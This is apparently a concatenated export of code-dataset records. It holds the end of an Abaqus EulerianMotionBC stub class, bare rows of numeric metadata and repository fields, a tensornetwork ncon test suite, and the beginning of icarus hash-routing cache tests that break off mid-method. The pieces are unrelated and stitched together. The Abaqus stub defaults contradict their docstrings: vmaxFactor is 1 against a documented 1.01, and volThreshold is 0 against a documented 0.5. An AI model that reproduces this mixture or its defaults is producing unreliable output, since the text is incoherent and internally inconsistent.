            A SymbolicConstant specifying the translational constraint on the negative (minimum)
            bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        expansionRatio3
            None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
            3 direction. If *expansionRatio3*=None, then there is no upper limit. The default value
            is None.
        contractRatio3
            A Float specifying the lower bounds on the allowable scaling of the mesh in the 3
            direction. The default value is 0.0.
        allowContraction
            A Boolean specifying whether the mesh is allowed to contract . The default value is ON.
        aspectLimit
            A Float specifying the maximum change in allowed aspect ratio (for any of the three mesh
            aspects, 1-2, 2-3, 3-1). The default value is 10.0.
        vmaxFactor
            A Float specifying the multiplier for the mesh nodal velocity limit. The default value
            is 1.01.
        volThreshold
            A Float specifying the lower bounds on the volume fraction when determining which nodes
            to include in the surface bounding box calculation for an Eulerian material surface.
            This argument applies only when *followRegion*=False. The default value is 0.5.
        bufferSize
            None or a Float specifying the buffer between the surface box and the Eulerian section
            mesh bounding box. The default value is 2.0.
        Returns
        -------
        An EulerianMotionBC object.
        """
        super().__init__()
        # Stub: the actual construction is performed by the Abaqus kernel at runtime.
        pass

    def setValues(self, instanceName: str = '', followRegion: Boolean = ON, region: Region = Region(),
                  materialName: str = '', ctrPosition1: SymbolicConstant = FREE,
                  posPosition1: SymbolicConstant = FREE, negPosition1: SymbolicConstant = FREE,
                  expansionRatio1: float = None, contractRatio1: float = 0,
                  ctrPosition2: SymbolicConstant = FREE, posPosition2: SymbolicConstant = FREE,
                  negPosition2: SymbolicConstant = FREE, expansionRatio2: float = None,
                  contractRatio2: float = 0, ctrPosition3: SymbolicConstant = FREE,
                  posPosition3: SymbolicConstant = FREE, negPosition3: SymbolicConstant = FREE,
                  expansionRatio3: float = None, contractRatio3: float = 0,
                  allowContraction: Boolean = ON, aspectLimit: float = 10, vmaxFactor: float = 1,
                  volThreshold: float = 0, bufferSize: float = 2):
        """This method modifies the data for an existing EulerianMotionBC object in the step where
        it is created.
        Parameters
        ----------
        instanceName
            A String specifying the name of the Eulerian part instance.
        followRegion
            A Boolean specifying whether the mesh will follow a regular surface region or an
            Eulerian surface. The default value is ON.
        region
            A Region object specifying the region to which the boundary condition is applied.
        materialName
            A String specifying the name of the Eulerian surface to follow. This argument applies
            only when *followRegion*=False.
        ctrPosition1
            A SymbolicConstant specifying the 1-direction translational constraint on the center of
            the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
        posPosition1
            A SymbolicConstant specifying the translational constraint on the positive (maximum)
            bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        negPosition1
            A SymbolicConstant specifying the translational constraint on the negative (minimum)
            bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        expansionRatio1
            None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
            1 direction. If *expansionRatio1*=None, then there is no upper limit. The default value
            is None.
        contractRatio1
            A Float specifying the lower bounds on the allowable scaling of the mesh in the 1
            direction. The default value is 0.0.
        ctrPosition2
            A SymbolicConstant specifying the 2-direction translational constraint on the center of
            the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
        posPosition2
            A SymbolicConstant specifying the translational constraint on the positive (maximum)
            bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        negPosition2
            A SymbolicConstant specifying the translational constraint on the negative (minimum)
            bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        expansionRatio2
            None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
            2 direction. If *expansionRatio2*=None, then there is no upper limit. The default value
            is None.
        contractRatio2
            A Float specifying the lower bounds on the allowable scaling of the mesh in the 2
            direction. The default value is 0.0.
        ctrPosition3
            A SymbolicConstant specifying the 3-direction translational constraint on the center of
            the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
        posPosition3
            A SymbolicConstant specifying the translational constraint on the positive (maximum)
            bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        negPosition3
            A SymbolicConstant specifying the translational constraint on the negative (minimum)
            bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        expansionRatio3
            None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
            3 direction. If *expansionRatio3*=None, then there is no upper limit. The default value
            is None.
        contractRatio3
            A Float specifying the lower bounds on the allowable scaling of the mesh in the 3
            direction. The default value is 0.0.
        allowContraction
            A Boolean specifying whether the mesh is allowed to contract . The default value is ON.
        aspectLimit
            A Float specifying the maximum change in allowed aspect ratio (for any of the three mesh
            aspects, 1-2, 2-3, 3-1). The default value is 10.0.
        vmaxFactor
            A Float specifying the multiplier for the mesh nodal velocity limit. The default value
            is 1.01.
        volThreshold
            A Float specifying the lower bounds on the volume fraction when determining which nodes
            to include in the surface bounding box calculation for an Eulerian material surface.
            This argument applies only when *followRegion*=False. The default value is 0.5.
        bufferSize
            None or a Float specifying the buffer between the surface box and the Eulerian section
            mesh bounding box. The default value is 2.0.
        """
        # Stub: the actual update is performed by the Abaqus kernel at runtime.
        pass

    def setValuesInStep(self, stepName: str, ctrPosition1: SymbolicConstant = FREE,
                        posPosition1: SymbolicConstant = FREE, negPosition1: SymbolicConstant = FREE,
                        expansionRatio1: float = None, contractRatio1: float = 0,
                        ctrPosition2: SymbolicConstant = FREE, posPosition2: SymbolicConstant = FREE,
                        negPosition2: SymbolicConstant = FREE, expansionRatio2: float = None,
                        contractRatio2: float = 0, ctrPosition3: SymbolicConstant = FREE,
                        posPosition3: SymbolicConstant = FREE, negPosition3: SymbolicConstant = FREE,
                        expansionRatio3: float = None, contractRatio3: float = 0,
                        allowContraction: Boolean = ON, aspectLimit: float = 10, vmaxFactor: float = 1,
                        volThreshold: float = 0, bufferSize: float = 2):
        """This method modifies the propagating data for an existing EulerianMotionBC object in the
        specified step.
        Parameters
        ----------
        stepName
            A String specifying the name of the step in which the boundary condition is modified.
        ctrPosition1
            A SymbolicConstant specifying the 1-direction translational constraint on the center of
            the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
        posPosition1
            A SymbolicConstant specifying the translational constraint on the positive (maximum)
            bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        negPosition1
            A SymbolicConstant specifying the translational constraint on the negative (minimum)
            bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        expansionRatio1
            None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
            1 direction. If *expansionRatio1*=None, then there is no upper limit. The default value
            is None.
        contractRatio1
            A Float specifying the lower bounds on the allowable scaling of the mesh in the 1
            direction. The default value is 0.0.
        ctrPosition2
            A SymbolicConstant specifying the 2-direction translational constraint on the center of
            the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
        posPosition2
            A SymbolicConstant specifying the translational constraint on the positive (maximum)
            bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        negPosition2
            A SymbolicConstant specifying the translational constraint on the negative (minimum)
            bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        expansionRatio2
            None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
            2 direction. If *expansionRatio2*=None, then there is no upper limit. The default value
            is None.
        contractRatio2
            A Float specifying the lower bounds on the allowable scaling of the mesh in the 2
            direction. The default value is 0.0.
        ctrPosition3
            A SymbolicConstant specifying the 3-direction translational constraint on the center of
            the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
        posPosition3
            A SymbolicConstant specifying the translational constraint on the positive (maximum)
            bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        negPosition3
            A SymbolicConstant specifying the translational constraint on the negative (minimum)
            bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        expansionRatio3
            None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
            3 direction. If *expansionRatio3*=None, then there is no upper limit. The default value
            is None.
        contractRatio3
            A Float specifying the lower bounds on the allowable scaling of the mesh in the 3
            direction. The default value is 0.0.
        allowContraction
            A Boolean specifying whether the mesh is allowed to contract . The default value is ON.
        aspectLimit
            A Float specifying the maximum change in allowed aspect ratio (for any of the three mesh
            aspects, 1-2, 2-3, 3-1). The default value is 10.0.
        vmaxFactor
            A Float specifying the multiplier for the mesh nodal velocity limit. The default value
            is 1.01.
        volThreshold
            A Float specifying the lower bounds on the volume fraction when determining which nodes
            to include in the surface bounding box calculation for an Eulerian material surface.
            This argument applies only when *followRegion*=False. The default value is 0.5.
        bufferSize
            None or a Float specifying the buffer between the surface box and the Eulerian section
            mesh bounding box. The default value is 2.0.
        """
        # Stub: the actual per-step update is performed by the Abaqus kernel at runtime.
        pass
| 55.505682
| 125
| 0.678439
| 3,678
| 29,307
| 5.403752
| 0.049483
| 0.075874
| 0.08
| 0.090667
| 0.947723
| 0.945459
| 0.944252
| 0.940277
| 0.933333
| 0.924579
| 0
| 0.016791
| 0.284676
| 29,307
| 527
| 126
| 55.611006
| 0.931263
| 0.765278
| 0
| 0.313433
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044776
| false
| 0.044776
| 0.044776
| 0
| 0.507463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
1a0536e548f4f74195a812ec5239d1c9ddb83942
| 11,730
|
py
|
Python
|
tensornetwork/tests/ncon_interface_test.py
|
jsalsman/TensorNetwork
|
9914ec04d5a783a445b8ee56c82030dc69fed3ed
|
[
"Apache-2.0"
] | 2
|
2019-11-22T20:03:47.000Z
|
2020-09-03T20:25:51.000Z
|
tensornetwork/tests/ncon_interface_test.py
|
olgOk/TensorNetwork
|
9744513329df4331c62f0b7a149081cc5c9d6ffd
|
[
"Apache-2.0"
] | null | null | null |
tensornetwork/tests/ncon_interface_test.py
|
olgOk/TensorNetwork
|
9744513329df4331c62f0b7a149081cc5c9d6ffd
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The TensorNetwork Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import numpy as np
from tensornetwork import BaseNode, Node
from tensornetwork import ncon_interface
from tensornetwork.contractors import greedy
def test_sanity_check(backend):
  """Contract two 2x2 ones-matrices over one shared label (a matmul)."""
  left, right = np.ones((2, 2)), np.ones((2, 2))
  out = ncon_interface.ncon([left, right], [(-1, 1), (1, -2)], backend=backend)
  np.testing.assert_allclose(out, np.ones((2, 2)) * 2)
def test_node_sanity_check(backend):
  """Same contraction as test_sanity_check, but with Node inputs."""
  left = Node(np.ones((2, 2)), backend=backend)
  right = Node(np.ones((2, 2)), backend=backend)
  out = ncon_interface.ncon([left, right], [(-1, 1), (1, -2)], backend=backend)
  np.testing.assert_allclose(out.tensor, np.ones((2, 2)) * 2)
def test_return_type(backend):
  """ncon returns a BaseNode only when all inputs are nodes, else a tensor."""
  t1, t2 = np.ones((2, 2)), np.ones((2, 2))
  n1, n2 = Node(t1, backend=backend), Node(t2, backend=backend)
  network = [(-1, 1), (1, -2)]
  from_tensors = ncon_interface.ncon([t1, t2], network, backend=backend)
  from_nodes = ncon_interface.ncon([n1, n2], network, backend=backend)
  from_mixed = ncon_interface.ncon([n1, t2], network, backend=backend)
  tensor_type = type(n1.backend.convert_to_tensor(t1))
  assert isinstance(from_tensors, tensor_type)
  assert isinstance(from_nodes, BaseNode)
  assert isinstance(from_mixed, tensor_type)
def test_order_spec(backend):
  """Explicit con_order/out_order combinations all give the default result."""
  a = np.ones((2, 2))
  expected = np.ones((2, 2)) * 2
  order_kwargs = [
      {'out_order': [-1, -2]},
      {'con_order': [1]},
      {'con_order': [1], 'out_order': [-1, -2]},
  ]
  for kwargs in order_kwargs:
    result = ncon_interface.ncon([a, a], [(-1, 1), (1, -2)],
                                 backend=backend, **kwargs)
    np.testing.assert_allclose(result, expected)
def test_node_order_spec(backend):
  """Node variant of test_order_spec: explicit orderings match the default."""
  node = Node(np.ones((2, 2)), backend=backend)
  expected = np.ones((2, 2)) * 2
  order_kwargs = [
      {'out_order': [-1, -2]},
      {'con_order': [1]},
      {'con_order': [1], 'out_order': [-1, -2]},
  ]
  for kwargs in order_kwargs:
    result = ncon_interface.ncon([node, node], [(-1, 1), (1, -2)],
                                 backend=backend, **kwargs)
    np.testing.assert_allclose(result.tensor, expected)
def test_order_spec_noninteger(backend):
  """String axis labels work for both con_order and out_order."""
  a = np.ones((2, 2))
  out = ncon_interface.ncon([a, a], [('o1', 'i'), ('i', 'o2')],
                            con_order=['i'],
                            out_order=['o1', 'o2'],
                            backend=backend)
  np.testing.assert_allclose(out, np.ones((2, 2)) * 2)
def test_node_order_spec_noninteger(backend):
  """Node variant: string axis labels in con_order/out_order."""
  node = Node(np.ones((2, 2)), backend=backend)
  out = ncon_interface.ncon([node, node], [('o1', 'i'), ('i', 'o2')],
                            con_order=['i'],
                            out_order=['o1', 'o2'],
                            backend=backend)
  np.testing.assert_allclose(out.tensor, np.ones((2, 2)) * 2)
def test_invalid_network(backend):
  """Each malformed index specification must raise ValueError."""
  a = np.ones((2, 2))
  bad_networks = [
      [(1, 2), (2, 1), (1, 2)],
      [(1, 2), (2, 2)],
      [(1, 2), (3, 1)],
      [(1, 2), (2, 0.1)],
      [(1, 2), (2, 't')],
      [(0, 1), (1, 0)],
      [(1,), (1, 2)],
  ]
  for network in bad_networks:
    with pytest.raises(ValueError):
      ncon_interface.ncon([a, a], network, backend=backend)
def test_node_invalid_network(backend):
  """Node variant: each malformed index specification raises ValueError."""
  a = Node(np.ones((2, 2)), backend=backend)
  bad_networks = [
      [(1, 2), (2, 1), (1, 2)],
      [(1, 2), (2, 2)],
      [(1, 2), (3, 1)],
      [(1, 2), (2, 0.1)],
      [(1, 2), (2, 't')],
      [(0, 1), (1, 0)],
      [(1,), (1, 2)],
  ]
  for network in bad_networks:
    with pytest.raises(ValueError):
      ncon_interface.ncon([a, a], network, backend=backend)
def test_invalid_order(backend):
  """Inconsistent con_order/out_order arguments must raise ValueError."""
  a = np.ones((2, 2))
  bad_cases = [
      ([(1, 2), (2, 1)], {'con_order': [2, 3]}),
      ([(1, 2), (2, 1)], {'out_order': [-1]}),
      ([('i1', 'i2'), ('i1', 'i2')],
       {'con_order': ['i1'], 'out_order': []}),
      ([('i1', 'i2'), ('i1', 'i2')],
       {'con_order': ['i1', 'i2'], 'out_order': ['i1']}),
      ([('i1', 'i2'), ('i1', 'i2')],
       {'con_order': ['i1', 'i1', 'i2'], 'out_order': []}),
  ]
  for network, order_kwargs in bad_cases:
    with pytest.raises(ValueError):
      ncon_interface.ncon([a, a], network, backend=backend, **order_kwargs)
def test_node_invalid_order(backend):
  """Node variant: inconsistent con_order/out_order raise ValueError."""
  a = Node(np.ones((2, 2)), backend=backend)
  bad_cases = [
      ([(1, 2), (2, 1)], {'con_order': [2, 3]}),
      ([(1, 2), (2, 1)], {'out_order': [-1]}),
      ([('i1', 'i2'), ('i1', 'i2')],
       {'con_order': ['i1'], 'out_order': []}),
      ([('i1', 'i2'), ('i1', 'i2')],
       {'con_order': ['i1', 'i2'], 'out_order': ['i1']}),
      ([('i1', 'i2'), ('i1', 'i2')],
       {'con_order': ['i1', 'i1', 'i2'], 'out_order': []}),
  ]
  for network, order_kwargs in bad_cases:
    with pytest.raises(ValueError):
      ncon_interface.ncon([a, a], network, backend=backend, **order_kwargs)
def test_out_of_order_contraction(backend):
  """Labels contracted out of ascending order emit a 'Suboptimal ordering' warning."""
  a = np.ones((2, 2, 2))
  network = [(-1, 1, 3), (1, 3, 2), (2, -2, -3)]
  with pytest.warns(UserWarning, match='Suboptimal ordering'):
    ncon_interface.ncon([a, a, a], network, backend=backend)
def test_node_out_of_order_contraction(backend):
  """Node variant: out-of-order labels emit a 'Suboptimal ordering' warning."""
  a = Node(np.ones((2, 2, 2)), backend=backend)
  network = [(-1, 1, 3), (1, 3, 2), (2, -2, -3)]
  with pytest.warns(UserWarning, match='Suboptimal ordering'):
    ncon_interface.ncon([a, a, a], network, backend=backend)
def test_output_order(backend):
  """Output labels (-2, -1) transpose the single input matrix."""
  mat = np.random.randn(2, 2)
  out = ncon_interface.ncon([mat], [(-2, -1)], backend=backend)
  np.testing.assert_allclose(out, mat.transpose())
def test_node_output_order(backend):
  """Node variant: output labels (-2, -1) transpose the input."""
  data = np.random.randn(2, 2)
  node = Node(data, backend=backend)
  out = ncon_interface.ncon([node], [(-2, -1)], backend=backend)
  np.testing.assert_allclose(out.tensor, data.transpose())
def test_outer_product(backend):
  """Outer product of two vectors, then a product of full contractions."""
  if backend == "jax":
    pytest.skip("Jax outer product support is currently broken.")
  vec3 = np.array([1, 2, 3])
  vec2 = np.array([1, 2])
  outer = ncon_interface.ncon([vec3, vec2], [(-1,), (-2,)], backend=backend)
  np.testing.assert_allclose(outer, np.kron(vec3, vec2).reshape((3, 2)))
  # (vec3 . vec3) * (vec3 . vec3) = 14 * 14 = 196
  scalar = ncon_interface.ncon([vec3, vec3, vec3, vec3],
                               [(1,), (1,), (2,), (2,)],
                               backend=backend)
  np.testing.assert_allclose(scalar, 196)
def test_node_outer_product(backend):
  """Node variant of test_outer_product."""
  if backend == "jax":
    pytest.skip("Jax outer product support is currently broken.")
  t1 = np.array([1, 2, 3])
  t2 = np.array([1, 2])
  a = Node(t1, backend=backend)
  b = Node(t2, backend=backend)
  outer = ncon_interface.ncon([a, b], [(-1,), (-2,)], backend=backend)
  np.testing.assert_allclose(outer.tensor, np.kron(t1, t2).reshape((3, 2)))
  # (t1 . t1) * (t1 . t1) = 14 * 14 = 196
  scalar = ncon_interface.ncon([a, a, a, a], [(1,), (1,), (2,), (2,)],
                               backend=backend)
  np.testing.assert_allclose(scalar.tensor, 196)
def test_trace(backend):
  """Repeating a label on one tensor takes the trace: tr(ones(2,2)) == 2."""
  mat = np.ones((2, 2))
  out = ncon_interface.ncon([mat], [(1, 1)], backend=backend)
  np.testing.assert_allclose(out, 2)
def test_node_trace(backend):
  """Node variant: repeated label on one node takes the trace."""
  node = Node(np.ones((2, 2)), backend=backend)
  out = ncon_interface.ncon([node], [(1, 1)], backend=backend)
  np.testing.assert_allclose(out.tensor, 2)
def test_small_matmul(backend):
  """Contracting the first axes of both matrices computes a.T @ b."""
  lhs = np.random.randn(2, 2)
  rhs = np.random.randn(2, 2)
  out = ncon_interface.ncon([lhs, rhs], [(1, -1), (1, -2)], backend=backend)
  np.testing.assert_allclose(out, lhs.transpose() @ rhs)
def test_node_small_matmul(backend):
  """Node variant: contracting the first axes computes t1.T @ t2."""
  t1 = np.random.randn(2, 2)
  t2 = np.random.randn(2, 2)
  node_a = Node(t1, backend=backend)
  node_b = Node(t2, backend=backend)
  out = ncon_interface.ncon([node_a, node_b], [(1, -1), (1, -2)],
                            backend=backend)
  np.testing.assert_allclose(out.tensor, t1.transpose() @ t2)
def test_contraction(backend):
  """Chain-contract three copies of a rank-3 tensor; compare with numpy."""
  a = np.random.randn(2, 2, 2)
  out = ncon_interface.ncon([a, a, a], [(-1, 1, 2), (1, 2, 3), (3, -2, -3)],
                            backend=backend)
  expected = a.reshape((2, 4)) @ a.reshape((4, 2)) @ a.reshape((2, 4))
  np.testing.assert_allclose(out, expected.reshape((2, 2, 2)))
def test_node_contraction(backend):
  """Node variant: chain-contract three copies of a rank-3 tensor."""
  tensor = np.random.randn(2, 2, 2)
  node = Node(tensor, backend=backend)
  out = ncon_interface.ncon([node, node, node],
                            [(-1, 1, 2), (1, 2, 3), (3, -2, -3)],
                            backend=backend)
  expected = (tensor.reshape((2, 4)) @ tensor.reshape((4, 2))
              @ tensor.reshape((2, 4)))
  np.testing.assert_allclose(out.tensor, expected.reshape((2, 2, 2)))
def test_backend_network(backend):
  """ncon_network builds nodes/edges that greedy contracts to the same result."""
  a = np.random.randn(2, 2, 2)
  nodes, _, out_edges = ncon_interface.ncon_network(
      [a, a, a], [(-1, 1, 2), (1, 2, 3), (3, -2, -3)], backend=backend)
  out = greedy(nodes, out_edges).tensor
  expected = a.reshape((2, 4)) @ a.reshape((4, 2)) @ a.reshape((2, 4))
  np.testing.assert_allclose(out, expected.reshape((2, 2, 2)))
| 38.084416
| 79
| 0.568201
| 1,651
| 11,730
| 3.918837
| 0.084797
| 0.024111
| 0.136631
| 0.116847
| 0.816229
| 0.810046
| 0.792117
| 0.758733
| 0.744668
| 0.733539
| 0
| 0.050937
| 0.245183
| 11,730
| 307
| 80
| 38.208469
| 0.679806
| 0.047997
| 0
| 0.717949
| 0
| 0
| 0.02116
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.102564
| false
| 0
| 0.021368
| 0
| 0.123932
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a1ef3d5f7eec5d6cac460b65de02c80c1606679
| 83,127
|
py
|
Python
|
icarus/models/strategy/tests/test_strategy.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 5
|
2021-03-20T09:22:55.000Z
|
2021-12-20T17:01:33.000Z
|
icarus/models/strategy/tests/test_strategy.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 1
|
2021-12-13T07:40:46.000Z
|
2021-12-20T16:59:08.000Z
|
icarus/models/strategy/tests/test_strategy.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 1
|
2021-11-25T05:42:20.000Z
|
2021-11-25T05:42:20.000Z
|
# -*- coding: utf-8 -*-
import unittest
import fnss
from icarus.scenarios import IcnTopology
import icarus.models as strategy
from icarus.execution import NetworkModel, NetworkView, NetworkController, DummyCollector
class TestHashroutingEdge(unittest.TestCase):
    """Tests for the HashroutingEdge strategy on a small diamond topology.

    The repeated location/local-lookup/session-summary assertion pattern of
    the original tests is factored into private helpers so each scenario
    reads as a sequence of (event, expected state) steps.
    """

    @classmethod
    def setUpClass(cls):
        pass

    @classmethod
    def tearDownClass(cls):
        pass

    @classmethod
    def topology(cls):
        """Return the test topology:

                 4
                / \\
        r ---- 1 -- 2 -- 3 ---- s

        "r" is a receiver, "s" the source; routers 1-4 each cache 4 items.
        """
        topology = IcnTopology()
        topology.add_path(["r", 1, 2, 3, "s"])
        topology.add_path([1, 4, 3])
        fnss.add_stack(topology, "r", "receiver")
        fnss.add_stack(topology, "s", "source", {'contents': range(1, 61)})
        for v in (1, 2, 3, 4):
            fnss.add_stack(topology, v, "router", {"cache_size": 4})
        topology.graph['icr_candidates'] = {1, 2, 3, 4}
        return topology

    def setUp(self):
        topology = self.topology()
        model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
        self.view = NetworkView(model)
        self.controller = NetworkController(model)
        self.collector = DummyCollector(self.view)
        self.controller.attach_collector(self.collector)

    def tearDown(self):
        pass

    def _assert_locations(self, content, members, non_members=()):
        # Assert which nodes do (and do not) hold *content* network-wide.
        loc = self.view.content_locations(content)
        for node in members:
            self.assertIn(node, loc)
        for node in non_members:
            self.assertNotIn(node, loc)

    def _assert_local_lookups(self, content, expected):
        # expected maps node -> whether local_cache_lookup must succeed.
        for node, hit in expected.items():
            if hit:
                self.assertTrue(self.view.local_cache_lookup(node, content))
            else:
                self.assertFalse(self.view.local_cache_lookup(node, content))

    def _assert_session(self, exp_req_hops, exp_cont_hops, serving_node):
        # Compare hop sets and serving node of the last collector session.
        summary = self.collector.session_summary()
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual(serving_node, summary['serving_node'])

    def test_hashrouting_symmetric_edge(self):
        hr = strategy.HashroutingEdge(self.view, self.controller, 'SYMM', 0.25)
        hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
        # At time 1, request content 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 4), (4, 3), (3, "s")],
                             [("s", 3), (3, 4), (4, 1), (1, "r")],
                             "s")
        # Let's request it again to make sure we have hit from edge cache
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: False})
        self._assert_session([("r", 1)], [(1, "r")], 1)
        # Now request content 7 which should replace 4 in the local cache of 1
        # but not 3, because 7 would take space in 3's coordinated ratio
        hr.process_event(1, "r", 7, True)
        self._assert_locations(7, ["s", 3])
        self._assert_local_lookups(7, {1: True, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 2), (2, 3), (3, "s")],
                             [("s", 3), (3, 2), (2, 1), (1, "r")],
                             "s")
        # Verify where 4 is still stored
        self._assert_local_lookups(4, {1: False, 2: False, 3: False})
        # Request again 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 4)], [(4, 1), (1, "r")], 4)

    def test_hashrouting_symmetric_edge_zero_local(self):
        # Local (uncoordinated) ratio is 0: nothing is ever cached locally.
        hr = strategy.HashroutingEdge(self.view, self.controller, 'SYMM', 0)
        hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
        # At time 1, request content 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: False, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 4), (4, 3), (3, "s")],
                             [("s", 3), (3, 4), (4, 1), (1, "r")],
                             "s")
        # Second request is served by the coordinated cache at node 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: False, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 4)], [(4, 1), (1, "r")], 4)
        # Request content 7, hash-routed to node 3
        hr.process_event(1, "r", 7, True)
        self._assert_locations(7, ["s", 3])
        self._assert_local_lookups(7, {1: False, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 2), (2, 3), (3, "s")],
                             [("s", 3), (3, 2), (2, 1), (1, "r")],
                             "s")
        # Verify where 4 is still stored
        self._assert_local_lookups(4, {1: False, 2: False, 3: False})
        # Request again 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s", 4])
        self._assert_local_lookups(4, {1: False, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 4)], [(4, 1), (1, "r")], 4)

    def test_hashrouting_symmetric_edge_zero_coordinated(self):
        # Local ratio is 1: the coordinated portion has no capacity, so
        # contents never appear in content_locations of the routers.
        hr = strategy.HashroutingEdge(self.view, self.controller, 'SYMM', 1)
        hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
        # At time 1, request content 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s"], non_members=[4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 4), (4, 3), (3, "s")],
                             [("s", 3), (3, 4), (4, 1), (1, "r")],
                             "s")
        # Let's request it again to make sure we have hit from edge cache
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s"], non_members=[4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: False})
        self._assert_session([("r", 1)], [(1, "r")], 1)
        # Now request content 7 which should replace 4 in the local cache of 1
        hr.process_event(1, "r", 7, True)
        self._assert_locations(7, ["s"], non_members=[3])
        self._assert_local_lookups(7, {1: True, 2: False, 3: False})
        self._assert_session([("r", 1), (1, 2), (2, 3), (3, "s")],
                             [("s", 3), (3, 2), (2, 1), (1, "r")],
                             "s")
        # Verify where 4 is still stored
        self._assert_local_lookups(4, {1: True, 2: False, 3: False})
        # Request again 4
        hr.process_event(1, "r", 4, True)
        self._assert_locations(4, ["s"], non_members=[4])
        self._assert_local_lookups(4, {1: True, 2: False, 3: False})
        self._assert_session([("r", 1)], [(1, "r")], 1)
class TestHashroutingOnPath(unittest.TestCase):
    """Tests for the HashroutingOnPath strategy on a small diamond topology.

    The repeated location/local-lookup/session-summary assertion pattern of
    the original tests is factored into private helpers so each scenario
    reads as a sequence of (event, expected state) steps.
    """

    @classmethod
    def setUpClass(cls):
        pass

    @classmethod
    def tearDownClass(cls):
        pass

    @classmethod
    def topology(cls):
        """Return the test topology:

                 4
                / \\
        r ---- 1 -- 2 -- 3 ---- s

        "r" is a receiver, "s" the source; routers 1-4 each cache 4 items.
        """
        topology = IcnTopology()
        topology.add_path(["r", 1, 2, 3, "s"])
        topology.add_path([1, 4, 3])
        fnss.add_stack(topology, "r", "receiver")
        fnss.add_stack(topology, "s", "source", {'contents': range(1, 61)})
        for v in (1, 2, 3, 4):
            fnss.add_stack(topology, v, "router", {"cache_size": 4})
        topology.graph['icr_candidates'] = {1, 2, 3, 4}
        return topology

    def setUp(self):
        topology = self.topology()
